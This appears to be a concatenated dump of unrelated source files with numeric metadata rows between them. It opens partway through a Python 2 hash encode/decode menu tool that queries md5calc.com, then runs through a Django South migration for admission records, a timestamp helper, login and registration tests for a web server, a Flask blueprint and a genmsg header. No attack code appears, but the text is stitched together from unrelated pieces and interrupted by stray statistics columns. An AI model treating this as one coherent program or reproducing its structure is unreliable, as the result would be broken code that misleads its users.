elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
tp = 'strlen'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e17()
tp = 'strlen'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e17()
def e18():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
tp = 'xxx'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e18()
tp = 'xxx'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e18()
def e19():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
tp = 'bbb'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e19()
tp = 'bbb'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e19()
def e20():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
tp = 'aaa'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e20()
tp = 'aaa'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e20()
def e21():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
tp = 'www'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e21()
tp = 'www'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e21()
def e22():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
tp = 'sss'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e22()
tp = 'sss'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e22()
def e23():
print ''
print tip
pil = raw_input('\x1b[1;32m[\x1b[1;33m?\x1b[1;32m] \x1b[1;37mPilih: ')
if pil == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
elif pil == '1':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
tp = 'eee'
tipe = 'ENCODE'
enc(hash, tp, tipe)
elif pil == '2':
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
e23()
tp = 'eee'
tipe = 'DECODE'
dec(hash, tp, tipe)
else:
print '%s[%s!%s] %sPilihan anda salah' % (G1, R1, G1, W0)
e23()
def auto():
print
hash = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[1;37mMasukkan kode mu: ')
if hash == '':
print '%s[%s!%s] %sJangan kosong' % (G1, R1, G1, W0)
time.sleep(0.8)
auto()
a = requests.get('https://md5calc.com/hash/md2/' + hash)
b = bs(a.content, 'html.parser')
c = b.find_all('td', style='white-space:normal;word-break:break-all;')[1]
d = b.find_all('td', style='white-space:normal;word-break:break-all;')[2]
e = b.find_all('td', style='white-space:normal;word-break:break-all;')[3]
f = b.find_all('td', style='white-space:normal;word-break:break-all;')[4]
g = b.find_all('td', style='white-space:normal;word-break:break-all;')[5]
h = b.find_all('td', style='white-space:normal;word-break:break-all;')[6]
i = b.find_all('td', style='white-space:normal;word-break:break-all;')[7]
j = b.find_all('td', style='white-space:normal;word-break:break-all;')[8]
k = b.find_all('td', style='white-space:normal;word-break:break-all;')[9]
l = b.find_all('td', style='white-space:normal;word-break:break-all;')[10]
m = b.find_all('td', style='white-space:normal;word-break:break-all;')[11]
n = b.find_all('td', style='white-space:normal;word-break:break-all;')[12]
o = b.find_all('td', style='white-space:normal;word-break:break-all;')[13]
p = b.find_all('td', style='white-space:normal;word-break:break-all;')[14]
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD2 : ', c.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD4 : ', d.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult MD5 : ', e.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA1 : ', f.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA224 : ', g.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA256 : ', h.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA384 : ', i.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512/224 : ', j.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512/256 : ', k.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA512 : ', l.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-224 : ', m.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-256 : ', n.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-384 : ', o.text.replace(' ', '').replace('\n', '')
print '\x1b[1;32m[\x1b[1;33m>\x1b[1;32m] \x1b[1;37mResult SHA3-512 : ', p.text.replace(' ', '').replace('\n', '')
print
raw_input('\n\x1b[32m [ \x1b[31menter to back menu \x1b[32m] ')
main()
if __name__ == '__main__':
pilih()
| 38.731401
| 1,793
| 0.509517
| 6,238
| 40,087
| 3.254889
| 0.07823
| 0.071119
| 0.061712
| 0.087667
| 0.815898
| 0.807181
| 0.796838
| 0.792996
| 0.789746
| 0.786101
| 0
| 0.165444
| 0.268865
| 40,087
| 1,034
| 1,794
| 38.768859
| 0.527312
| 0.001597
| 0
| 0.816284
| 0
| 0.101253
| 0.434433
| 0.21924
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.002088
| null | null | 0.200418
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
3ab1a1c6d2d60406f2d2569bc7ede2a678b0ab91
| 332
|
py
|
Python
|
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
vaetc/evaluation/metrics/do2020/__init__.py
|
ganmodokix/vaetc
|
866b79677b4f06603203376d967989dedadbffae
|
[
"MIT"
] | null | null | null |
from .entropy import entropy_binary
from .entropy import entropy_joint_binary
from .entropy import entropy_conditioned
from .entropy import entropy_histogram
from .entropy import entropy_quantization
from .entropy import entropy_sampling
from .mutual import misjed, windin, rmig_jemmig, informativeness, mig_sup, modularity, dcimig
| 41.5
| 93
| 0.858434
| 43
| 332
| 6.418605
| 0.44186
| 0.23913
| 0.369565
| 0.521739
| 0.217391
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.10241
| 332
| 8
| 93
| 41.5
| 0.926175
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c91a69441feba83d5cf26ff452210244a16b0642
| 7,553
|
py
|
Python
|
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
campaigns/migrations/0001_initial.py
|
Springsteen/tues_admission
|
3a532d34bd9a93ac5dcc450d7ddc81f7fb4b6fb7
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Campaign'
db.create_table(u'campaigns_campaign', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('title', self.gf('django.db.models.fields.CharField')(default='', max_length=40)),
('description', self.gf('django.db.models.fields.TextField')(default='', max_length=500)),
('is_completed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'campaigns', ['Campaign'])
# Adding model 'Hall'
db.create_table(u'campaigns_hall', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('campaign', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['campaigns.Campaign'])),
('name', self.gf('django.db.models.fields.CharField')(default='', max_length=10)),
('capacity', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal(u'campaigns', ['Hall'])
# Adding model 'Student'
db.create_table(u'campaigns_student', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('campaign', self.gf('django.db.models.fields.related.ForeignKey')(default=1, to=orm['campaigns.Campaign'])),
('hall', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['campaigns.Hall'], null=True, blank=True)),
('egn', self.gf('django.db.models.fields.CharField')(default='', max_length=10)),
('entry_number', self.gf('django.db.models.fields.IntegerField')(default=0)),
('first_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
('second_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
('third_name', self.gf('django.db.models.fields.CharField')(default='', max_length=30)),
('address', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
('parent_name', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
('parent_number', self.gf('django.db.models.fields.CharField')(default='', max_length=30, null=True, blank=True)),
('previous_school', self.gf('django.db.models.fields.CharField')(default='', max_length=100, null=True, blank=True)),
('bel_school', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
('physics_school', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
('bel_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
('maths_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
('maths_tues_exam', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
('first_choice', self.gf('django.db.models.fields.CharField')(default='', max_length=2, null=True, blank=True)),
('second_choice', self.gf('django.db.models.fields.CharField')(default='', max_length=2, null=True, blank=True)),
('grades_evaluated', self.gf('django.db.models.fields.FloatField')(default=0, null=True, blank=True)),
))
db.send_create_signal(u'campaigns', ['Student'])
def backwards(self, orm):
# Deleting model 'Campaign'
db.delete_table(u'campaigns_campaign')
# Deleting model 'Hall'
db.delete_table(u'campaigns_hall')
# Deleting model 'Student'
db.delete_table(u'campaigns_student')
models = {
u'campaigns.campaign': {
'Meta': {'object_name': 'Campaign'},
'description': ('django.db.models.fields.TextField', [], {'default': "''", 'max_length': '500'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_completed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40'})
},
u'campaigns.hall': {
'Meta': {'object_name': 'Hall'},
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['campaigns.Campaign']"}),
'capacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10'})
},
u'campaigns.student': {
'Meta': {'object_name': 'Student'},
'address': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'bel_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'bel_school': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'campaign': ('django.db.models.fields.related.ForeignKey', [], {'default': '1', 'to': u"orm['campaigns.Campaign']"}),
'egn': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '10'}),
'entry_number': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'first_choice': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2', 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'}),
'grades_evaluated': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hall': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['campaigns.Hall']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maths_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'maths_tues_exam': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'parent_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'parent_number': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30', 'null': 'True', 'blank': 'True'}),
'physics_school': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'previous_school': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100', 'null': 'True', 'blank': 'True'}),
'second_choice': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '2', 'null': 'True', 'blank': 'True'}),
'second_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'}),
'third_name': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '30'})
}
}
complete_apps = ['campaigns']
| 71.254717
| 146
| 0.592083
| 872
| 7,553
| 5.026376
| 0.104358
| 0.104038
| 0.178873
| 0.255533
| 0.854438
| 0.820671
| 0.787817
| 0.732831
| 0.711613
| 0.644992
| 0
| 0.012571
| 0.178472
| 7,553
| 106
| 147
| 71.254717
| 0.693795
| 0.021316
| 0
| 0.149425
| 0
| 0
| 0.469871
| 0.271225
| 0
| 0
| 0
| 0
| 0
| 1
| 0.022989
| false
| 0
| 0.045977
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c98332d2984028c82fe9788a5914d8bb422e394b
| 532
|
py
|
Python
|
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
Utils.py
|
leader1313/Visualization_regression_models
|
7bcb57cc931da3379b213b27259886d83912d15e
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timezone, timedelta
class ID_generator():
def __init__(self):
self.now = datetime.now(timezone(timedelta(hours=9)))
def time_stamp(self):
now = datetime.now(timezone(timedelta(hours=9)))
return now.strftime('%H%M%S')
def date_stamp(self):
now = datetime.now(timezone(timedelta(hours=9)))
return now.strftime('%Y%m%d')
def now_stamp(self):
now = datetime.now(timezone(timedelta(hours=9)))
return now.strftime('%Y%m%d%H%M%S')
| 28
| 61
| 0.639098
| 74
| 532
| 4.486486
| 0.324324
| 0.256024
| 0.180723
| 0.216867
| 0.710843
| 0.710843
| 0.710843
| 0.710843
| 0.587349
| 0.587349
| 0
| 0.009501
| 0.208647
| 532
| 18
| 62
| 29.555556
| 0.779097
| 0
| 0
| 0.230769
| 0
| 0
| 0.045113
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.307692
| false
| 0
| 0.076923
| 0
| 0.692308
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a30d700e69367ba47176d4a18cce85d1421eb6ea
| 155
|
py
|
Python
|
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
app/blueprints/www_main/__init__.py
|
lvyao1985/wx-project
|
fb98b3fb9b9ed3277ed20435664b696275625b60
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from flask import Blueprint
bp_www_main = Blueprint('bp_www_main', __name__, static_folder='static')
from . import extensions
| 15.5
| 72
| 0.722581
| 21
| 155
| 4.904762
| 0.666667
| 0.213592
| 0.271845
| 0.349515
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007576
| 0.148387
| 155
| 9
| 73
| 17.222222
| 0.772727
| 0.135484
| 0
| 0
| 0
| 0
| 0.128788
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
a31b05013e49438bb9aeaeeb65db9eb60e090ff3
| 6,730
|
py
|
Python
|
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
tests/test_web.py
|
blueshed/liteblue
|
9c2fd09cc1449631c86cf6cdda745f884dc90dbd
|
[
"MIT"
] | null | null | null |
""" test the web server """
import urllib.parse
from tornado.httpclient import HTTPClientError
from sqlalchemy.sql import insert
from liteblue.connection import ConnectionMgr
from liteblue.user import user
async def test_login(http_server_client):
resp = await http_server_client.fetch("/login")
assert resp.code == 200
try:
resp = await http_server_client.fetch("/", follow_redirects=False)
assert resp.code == 302
except HTTPClientError as ex:
assert ex.code == 302
async def test_register_fail(http_server_client):
body = urllib.parse.urlencode(
{"email": "boo@hoo.com", "password": "1234", "submit": "register"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
response = await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
assert "Password must be five or more characters" in response.body.decode("utf-8")
async def test_register(http_server_client):
body = urllib.parse.urlencode(
{"email": "boo@hoo.com", "password": "12345", "submit": "register"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
try:
await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
except HTTPClientError as ex:
print(ex.response.headers)
cookie = ex.response.headers["Set-Cookie"]
assert ex.code == 302
resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
assert resp.code == 200
async def test_pre_register(http_server_client, default_db):
""" test the user pre registered no password """
with ConnectionMgr.session(default_db) as session:
session.execute(insert(user, {"email": "boop@test.com"}))
session.commit()
body = urllib.parse.urlencode(
{"email": "boop@test.com", "password": "12345", "submit": "register"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
try:
await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
except HTTPClientError as ex:
print(ex.response.headers)
cookie = ex.response.headers["Set-Cookie"]
assert ex.code == 302
resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
assert resp.code == 200
async def test_register_already_fail(http_server_client):
body = urllib.parse.urlencode(
{"email": "boo@hoo.com", "password": "12345", "submit": "register"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
response = await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
assert "Already registered" in response.body.decode("utf-8")
async def test_login_fail_no_email(http_server_client):
body = {"password": "12345", "submit": "login"}
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
response = await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=urllib.parse.urlencode(body),
follow_redirects=False,
)
assert "email or password is None" in response.body.decode("utf-8")
async def test_login_fail_no_password(http_server_client):
body = {"email": "boo@hoo.com", "submit": "login"}
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
response = await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=urllib.parse.urlencode(body),
follow_redirects=False,
)
assert "email or password is None" in response.body.decode("utf-8")
async def test_login_fail_no_user(http_server_client):
body = {"email": "boo@hoo.com", "password": "54321", "submit": "login"}
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
response = await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=urllib.parse.urlencode(body),
follow_redirects=False,
)
assert "email or password incorrect" in response.body.decode("utf-8")
async def test_home_page(http_server_client):
body = urllib.parse.urlencode(
{"email": "boo@hoo.com", "password": "12345", "submit": "login"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
try:
await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
except HTTPClientError as ex:
print(ex.response.headers)
cookie = ex.response.headers["Set-Cookie"]
assert ex.code == 302
resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
assert resp.code == 200
async def test_logout(http_server_client):
body = urllib.parse.urlencode(
{"email": "boo@hoo.com", "password": "12345", "submit": "login"}
)
headers = {
"Content-type": "application/x-www-form-urlencoded",
"Accept": "text/plain",
}
try:
await http_server_client.fetch(
"/login",
headers=headers,
method="POST",
body=body,
follow_redirects=False,
)
except HTTPClientError as ex:
print(ex.response.headers)
cookie = ex.response.headers["Set-Cookie"]
assert ex.code == 302
resp = await http_server_client.fetch("/", headers={"Cookie": cookie})
assert resp.code == 200
try:
await http_server_client.fetch(
"/logout", headers=headers, method="GET", follow_redirects=False
)
except HTTPClientError as ex:
print(ex.response.headers)
cookie = ex.response.headers["Set-Cookie"]
assert cookie.startswith('liteblue-app-user="";')
assert ex.code == 302
async def test_public_access(no_login_url, http_server_client):
""" test without login_url """
resp = await http_server_client.fetch("/")
assert resp.code == 200
| 30.179372
| 86
| 0.609361
| 760
| 6,730
| 5.267105
| 0.132895
| 0.069948
| 0.111916
| 0.089183
| 0.819136
| 0.804896
| 0.77392
| 0.76043
| 0.743442
| 0.725456
| 0
| 0.016573
| 0.255869
| 6,730
| 222
| 87
| 30.315315
| 0.782748
| 0.002823
| 0
| 0.694737
| 0
| 0
| 0.192906
| 0.048
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0
| false
| 0.068421
| 0.026316
| 0
| 0.026316
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
a341beb68678556c3aff7678653b09cccf9da48f
| 2,675
|
py
|
Python
|
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | 1
|
2021-11-08T12:24:24.000Z
|
2021-11-08T12:24:24.000Z
|
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | null | null | null |
build/ros/common_msgs/geometry_msgs/cmake/geometry_msgs-genmsg-context.py
|
hyu-nani/ydlidar_ws
|
56316db999c057c4315a20ba8277826d6a043120
|
[
"MIT"
] | null | null | null |
# generated from genmsg/cmake/pkg-genmsg.context.in
